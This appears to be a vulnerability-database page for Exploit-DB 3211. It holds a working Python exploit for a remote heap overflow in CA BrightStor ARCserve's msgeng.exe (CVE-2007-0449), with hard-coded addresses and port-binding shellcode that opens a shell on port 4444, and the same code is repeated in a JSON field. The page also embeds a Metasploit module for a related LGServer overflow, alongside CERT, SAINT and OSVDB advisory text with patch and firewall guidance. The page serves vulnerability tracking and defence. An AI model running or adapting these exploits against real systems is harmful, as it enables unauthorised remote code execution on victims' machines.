Search...

CA BrightStor ARCserve msgeng.exe Remote Heap Overflow Exploit

2007-01-27T00:00:00

ID EDB-ID:3211
Type exploitdb
Reporter Winny Thomas
Modified 2007-01-27T00:00:00

Description

CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit. CVE-2007-0449. Remote exploit for windows platform

                                        
                                            #!/usr/bin/python
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
# to port to other platforms. The exploit overwrites the
# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
# address of call dword ptr [esi +4C] located in user32.dll. At the time when
# UEF is called esi +4C contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code

from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import struct
import sys

def DCEconnectAndExploit(target):
       trans = transport.TCPTransport(target, 6503)
       trans.connect()
       dce = dcerpc.DCERPC_v5(trans)
       dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))

       request = "A" * 676
       request += "\x90\x90\x90\x90"
       request += "\x90\x90\xeb\x0a"

       #Call dword ptr [esi +4C] from user32.dll
       request += struct.pack("&lt;L", 0x77E4FB7A)
       #Overwrite UnhandledExceptionFilter in Windows 2000 SP0
       request += struct.pack("&lt;L", 0x77EE044C)
       request += "\x90\x90\x90\x90" * 2
       #Portbinding shellcode; Opens shell on TCP port 4444
       request += "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
       request += "\x6f\xe3\x2a\x83\xeb\xfc\xe2\xf4\x1c\x05\x08\x67\x08\x96\x1c\xd5"
       request += "\x1f\x0f\x68\x46\xc4\x4b\x68\x6f\xdc\xe4\x9f\x2f\x98\x6e\x0c\xa1"
       request += "\xaf\x77\x68\x75\xc0\x6e\x08\x63\x6b\x5b\x68\x2b\x0e\x5e\x23\xb3"
       request += "\x4c\xeb\x23\x5e\xe7\xae\x29\x27\xe1\xad\x08\xde\xdb\x3b\xc7\x02"
       request += "\x95\x8a\x68\x75\xc4\x6e\x08\x4c\x6b\x63\xa8\xa1\xbf\x73\xe2\xc1"
       request += "\xe3\x43\x68\xa3\x8c\x4b\xff\x4b\x23\x5e\x38\x4e\x6b\x2c\xd3\xa1"
       request += "\xa0\x63\x68\x5a\xfc\xc2\x68\x6a\xe8\x31\x8b\xa4\xae\x61\x0f\x7a"
       request += "\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa"
       request += "\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28"
       request += "\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79"
       request += "\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb"
       request += "\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42"
       request += "\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63"
       request += "\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d"
       request += "\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a"
       request += "\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07"
       request += "\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5"
       request += "\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b"
       request += "\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa"
       request += "\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75"
       request += "\xb3\x90\x35\xd5\x30\x6f\xe3\x2a"

       dce.call(43, request)

if __name__ == '__main__':
       try:
               target = sys.argv[1]
       except IndexError:
               print 'Usage: %s &lt;target ip&gt;\n' % sys.argv[0]
               sys.exit(-1)

       DCEconnectAndExploit(target)

# milw0rm.com [2007-01-27]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:3211", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CA BrightStor ARCserve msgeng.exe Remote Heap Overflow Exploit", "description": "CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit. CVE-2007-0449. Remote exploit for windows platform", "published": "2007-01-27T00:00:00", "modified": "2007-01-27T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3211/", "reporter": "Winny Thomas", "references": [], "cvelist": ["CVE-2007-0449"], "lastseen": "2016-01-31T17:58:26", "viewCount": 11, "enchantments": {"score": {"value": 9.4, "vector": "NONE", "modified": "2016-01-31T17:58:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0449"]}, {"type": "cert", "idList": ["VU:611276", "VU:357308"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83087"]}, {"type": "exploitdb", "idList": ["EDB-ID:16400"]}, {"type": "saint", "idList": ["SAINT:AC07CF401B0C02203F9F5BD5BA41706E", "SAINT:17867A60CC8CA6EA88789A5EEAB306FD", "SAINT:C246974F40EAE8BFB0C170267BC4B213"]}, {"type": "osvdb", "idList": ["OSVDB:31593"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6903", "SECURITYVULNS:DOC:15821"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER"]}, {"type": "nessus", "idList": ["ARCSERVE_QO83833.NASL"]}], "modified": "2016-01-31T17:58:26", "rev": 2}, "vulnersScore": 9.4}, "sourceHref": "https://www.exploit-db.com/download/3211/", "sourceData": "#!/usr/bin/python\n# I couldnt find a reliable exploit for my analysis and so came up with this.\n# Remote exploit for the CA BrightStor msgeng.exe service heap overflow\n# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was\n# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard\n# to port to other platforms. The exploit overwrites the\n# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the\n# address of call dword ptr [esi +4C] located in user32.dll. At the time when\n# UEF is called esi +4C contains a pointer to our shellcode.\n#\n# Winny M Thomas ;-)\n# Author shall bear no responsibility for any screw ups caused by using this code\n\nfrom impacket.dcerpc import transport, dcerpc\nfrom impacket import uuid\nimport struct\nimport sys\n\ndef DCEconnectAndExploit(target):\n trans = transport.TCPTransport(target, 6503)\n trans.connect()\n dce = dcerpc.DCERPC_v5(trans)\n dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))\n\n request = \"A\" * 676\n request += \"\\x90\\x90\\x90\\x90\"\n request += \"\\x90\\x90\\xeb\\x0a\"\n\n #Call dword ptr [esi +4C] from user32.dll\n request += struct.pack(\"<L\", 0x77E4FB7A)\n #Overwrite UnhandledExceptionFilter in Windows 2000 SP0\n request += struct.pack(\"<L\", 0x77EE044C)\n request += \"\\x90\\x90\\x90\\x90\" * 2\n #Portbinding shellcode; Opens shell on TCP port 4444\n request += \"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xe0\"\n request += \"\\x6f\\xe3\\x2a\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x05\\x08\\x67\\x08\\x96\\x1c\\xd5\"\n request += \"\\x1f\\x0f\\x68\\x46\\xc4\\x4b\\x68\\x6f\\xdc\\xe4\\x9f\\x2f\\x98\\x6e\\x0c\\xa1\"\n request += \"\\xaf\\x77\\x68\\x75\\xc0\\x6e\\x08\\x63\\x6b\\x5b\\x68\\x2b\\x0e\\x5e\\x23\\xb3\"\n request += \"\\x4c\\xeb\\x23\\x5e\\xe7\\xae\\x29\\x27\\xe1\\xad\\x08\\xde\\xdb\\x3b\\xc7\\x02\"\n request += \"\\x95\\x8a\\x68\\x75\\xc4\\x6e\\x08\\x4c\\x6b\\x63\\xa8\\xa1\\xbf\\x73\\xe2\\xc1\"\n request += \"\\xe3\\x43\\x68\\xa3\\x8c\\x4b\\xff\\x4b\\x23\\x5e\\x38\\x4e\\x6b\\x2c\\xd3\\xa1\"\n request += \"\\xa0\\x63\\x68\\x5a\\xfc\\xc2\\x68\\x6a\\xe8\\x31\\x8b\\xa4\\xae\\x61\\x0f\\x7a\"\n request += \"\\x1f\\xb9\\x85\\x79\\x86\\x07\\xd0\\x18\\x88\\x18\\x90\\x18\\xbf\\x3b\\x1c\\xfa\"\n request += \"\\x88\\xa4\\x0e\\xd6\\xdb\\x3f\\x1c\\xfc\\xbf\\xe6\\x06\\x4c\\x61\\x82\\xeb\\x28\"\n request += \"\\xb5\\x05\\xe1\\xd5\\x30\\x07\\x3a\\x23\\x15\\xc2\\xb4\\xd5\\x36\\x3c\\xb0\\x79\"\n request += \"\\xb3\\x3c\\xa0\\x79\\xa3\\x3c\\x1c\\xfa\\x86\\x07\\xf2\\x76\\x86\\x3c\\x6a\\xcb\"\n request += \"\\x75\\x07\\x47\\x30\\x90\\xa8\\xb4\\xd5\\x36\\x05\\xf3\\x7b\\xb5\\x90\\x33\\x42\"\n request += \"\\x44\\xc2\\xcd\\xc3\\xb7\\x90\\x35\\x79\\xb5\\x90\\x33\\x42\\x05\\x26\\x65\\x63\"\n request += \"\\xb7\\x90\\x35\\x7a\\xb4\\x3b\\xb6\\xd5\\x30\\xfc\\x8b\\xcd\\x99\\xa9\\x9a\\x7d\"\n request += \"\\x1f\\xb9\\xb6\\xd5\\x30\\x09\\x89\\x4e\\x86\\x07\\x80\\x47\\x69\\x8a\\x89\\x7a\"\n request += \"\\xb9\\x46\\x2f\\xa3\\x07\\x05\\xa7\\xa3\\x02\\x5e\\x23\\xd9\\x4a\\x91\\xa1\\x07\"\n request += \"\\x1e\\x2d\\xcf\\xb9\\x6d\\x15\\xdb\\x81\\x4b\\xc4\\x8b\\x58\\x1e\\xdc\\xf5\\xd5\"\n request += \"\\x95\\x2b\\x1c\\xfc\\xbb\\x38\\xb1\\x7b\\xb1\\x3e\\x89\\x2b\\xb1\\x3e\\xb6\\x7b\"\n request += \"\\x1f\\xbf\\x8b\\x87\\x39\\x6a\\x2d\\x79\\x1f\\xb9\\x89\\xd5\\x1f\\x58\\x1c\\xfa\"\n request += \"\\x6b\\x38\\x1f\\xa9\\x24\\x0b\\x1c\\xfc\\xb2\\x90\\x33\\x42\\x10\\xe5\\xe7\\x75\"\n request += \"\\xb3\\x90\\x35\\xd5\\x30\\x6f\\xe3\\x2a\"\n\n dce.call(43, request)\n\nif __name__ == '__main__':\n try:\n target = sys.argv[1]\n except IndexError:\n print 'Usage: %s <target ip>\\n' % sys.argv[0]\n sys.exit(-1)\n\n DCEconnectAndExploit(target)\n\n# milw0rm.com [2007-01-27]\n", "osvdbidlist": ["31593"]}

{"cve": [{"lastseen": "2021-02-02T05:31:20", "description": "Multiple buffer overflows in LGSERVER.EXE in CA BrightStor ARCserve Backup for Laptops and Desktops r11.0 through r11.1 SP1, Mobile Backup r4.0, Desktop and Business Protection Suite r2, and Desktop Management Suite (DMS) r11.0 and r11.1 allow remote attackers to execute arbitrary code via crafted packets to TCP port (1) 1900 or (2) 2200.", "edition": 4, "cvss3": {}, "published": "2007-01-23T21:28:00", "title": "CVE-2007-0449", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0449"], "modified": "2018-10-16T16:32:00", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops:11.0", "cpe:/a:ca:desktop_management_suite:11.1", "cpe:/a:ca:desktop_protection_suite:2.0", "cpe:/a:ca:brightstor_mobile_backup:r4.0", "cpe:/a:ca:desktop_management_suite:11.0", "cpe:/a:ca:business_protection_suite:2.0", "cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops:11.1"], "id": "CVE-2007-0449", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0449", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ca:desktop_management_suite:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_mobile_backup:r4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:business_protection_suite:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup_laptops_desktops:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:desktop_protection_suite:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:desktop_management_suite:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup_laptops_desktops:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup_laptops_desktops:11.1:sp1:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "SAINT:AC07CF401B0C02203F9F5BD5BA41706E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "type": "saint", "title": "BrightStor ARCserve LGServer buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "SAINT:C246974F40EAE8BFB0C170267BC4B213", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "title": "BrightStor ARCserve LGServer buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:46", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "edition": 2, "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "SAINT:17867A60CC8CA6EA88789A5EEAB306FD", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "type": "saint", "title": "BrightStor ARCserve LGServer buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:29", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83087", "href": "https://packetstormsecurity.com/files/83087/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Computer Associates BrightStor ARCserve Backup \nfor Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could \noverflow the buffer and execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-0449' ], \n[ 'OSVDB', '31593' ], \n[ 'BID', '22342' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 600, \n'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], \n], \n'DisclosureDate' => 'Jan 31 2007', \n'DefaultTarget' => 0)) \n \nregister_options([ Opt::RPORT(1900) ], self.class) \nend \n \ndef exploit \nconnect \n \nfiller = \"0000016705\" + rand_text_english(2322) \nseh = generate_seh_payload(target.ret) \nsploit = filler + seh + \"\\x58\" * 0x4141 \n \nprint_status(\"Trying target #{target.name}...\") \n \nsock.put(sploit) \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83087/lgserver.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "cvelist": ["CVE-2007-0449"], "description": "## Solution Description\nUpgrade to appropriate version recommended by the vendor or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp\nVendor Specific News/Changelog Entry: http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696\n[Secunia Advisory ID:23897](https://secuniaresearch.flexerasoftware.com/advisories/23897/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0545.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0683.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0684.html\nISS X-Force ID: 31704\nFrSIRT Advisory: ADV-2007-0314\n[CVE-2007-0449](https://vulners.com/cve/CVE-2007-0449)\nCERT VU: 611276\nCERT VU: 357308\nBugtraq ID: 22342\nBugtraq ID: 22340\n", "edition": 1, "modified": "2007-01-23T00:00:00", "published": "2007-01-23T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:31593", "id": "OSVDB:31593", "title": "CA BrightStor ARCserve Backup Multiple Overflows", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:54", "bulletinFamily": "info", "cvelist": ["CVE-2007-0449"], "description": "### Overview \n\nComputer Associates BrightStor ARCserve Backup contains a stack buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nComputer Associates BrightStor ARCserve Backup products come with a service called `LGSERVER.EXE`. This service listens on ports `2200/tcp` and `1900/tcp`. The LGSERVER.EXE process fails to properly validate data packets received on port `1900/tcp`, which can cause a stack buffer overflow. According to Computer Associates [CAID 34993](<http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696>), the following products are affected\n\n`BrightStor ARCserve:`\n\n`BrightStor ARCserve Backup for Laptops and Desktops r11.1 SP1` \n`BrightStor ARCserve Backup for Laptops and Desktops r11.1` \n`BrightStor ARCserve Backup for Laptops and Desktops r11.0` \n`BrightStor Mobile Backup r4.0``CA Protection Suites r2:`\n\n`CA Desktop Protection Suite r2` \n`CA Business Protection Suite r2` \n`CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2` \n`CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2``CA Desktop Management Suite:`\n\n`DMS r11.0` \n`DMS r11.1`Note that exploit code for this vulnerability is publicly available. \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with local SYSTEM privileges or cause a denial-of-service condition on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply an update** \nApply an update, as specified in Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). The following fixes are provided \n \n`BABLD r11.1 SP2 \u2013 SP2 does not contain the vulnerability, there is no fix to apply \nBABLD r11.1 SP1 - QO83833 \nBABLD r11.0 - QI85497 \nDMS r11.1 - QO85401 \nDMS r11.0 - QI85423 \nBMB r4.0 - QO85402` \n \n--- \n \n**Restrict access**\n\n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by the Discovery Service (typically `2200/tcp` and `1900/tcp`). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Vendor Information\n\n611276\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Computer Associates __ Affected\n\nUpdated: January 31, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the [BrightStor Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23611276 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>\n * <http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696>\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34993>\n * <http://secunia.com/advisories/23897>\n * <http://xforce.iss.net/xforce/xfdb/31704>\n * <http://osvdb.org/displayvuln.php?osvdb_id=31593>\n\n### Acknowledgements\n\nThis vulnerability was disclosed by Computer Associates, who in turn credit NGSS.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0449](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-0449>) \n---|--- \n**Severity Metric:** | 25.74 \n**Date Public:** | 2007-01-23 \n**Date First Published:** | 2007-01-31 \n**Date Last Updated: ** | 2007-02-02 20:18 UTC \n**Document Revision: ** | 15 \n", "modified": "2007-02-02T20:18:00", "published": "2007-01-31T00:00:00", "id": "VU:611276", "href": "https://www.kb.cert.org/vuls/id/611276", "type": "cert", "title": "Computer Associates BrightStor ARCserve Backup LGSERVER.EXE stack buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:42:55", "bulletinFamily": "info", "cvelist": ["CVE-2007-0449"], "description": "### Overview \n\nComputer Associates BrightStor ARCserve Backup contains a buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nComputer Associates BrightStor ARCserve Backup products come with a service called `LGSERVER.EXE`. This service listens on ports `2200/tcp` and `1900/tcp`. The LGSERVER.EXE process fails to properly validate the size of data received on port `2200/tcp`, which can cause heap memory corruption. According to Computer Associates [CAID 34993](<http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696>), the following products are affected\n\n`BrightStor ARCserve:`\n\n`BrightStor ARCserve Backup for Laptops and Desktops r11.1 SP1` \n`BrightStor ARCserve Backup for Laptops and Desktops r11.1` \n`BrightStor ARCserve Backup for Laptops and Desktops r11.0` \n`BrightStor Mobile Backup r4.0``CA Protection Suites r2:`\n\n`CA Desktop Protection Suite r2` \n`CA Business Protection Suite r2` \n`CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2` \n`CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2``CA Desktop Management Suite:`\n\n`DMS r11.0` \n`DMS r11.1` \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with local SYSTEM privileges or cause a denial-of-service condition on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply an update**Apply an update, as specified in Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). The following fixes are provided \n \n`BABLD r11.1 SP2 \u2013 SP2 does not contain the vulnerability, there is no fix to apply \nBABLD r11.1 SP1 - QO83833 \nBABLD r11.0 - QI85497 \nDMS r11.1 - QO85401 \nDMS r11.0 - QI85423 \nBMB r4.0 - QO85402` \n \n--- \n \n**Restrict access**\n\n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by the Discovery Service (typically `2200/tcp` and `1900/tcp`). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Vendor Information\n\n357308\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Computer Associates __ Affected\n\nUpdated: January 31, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the 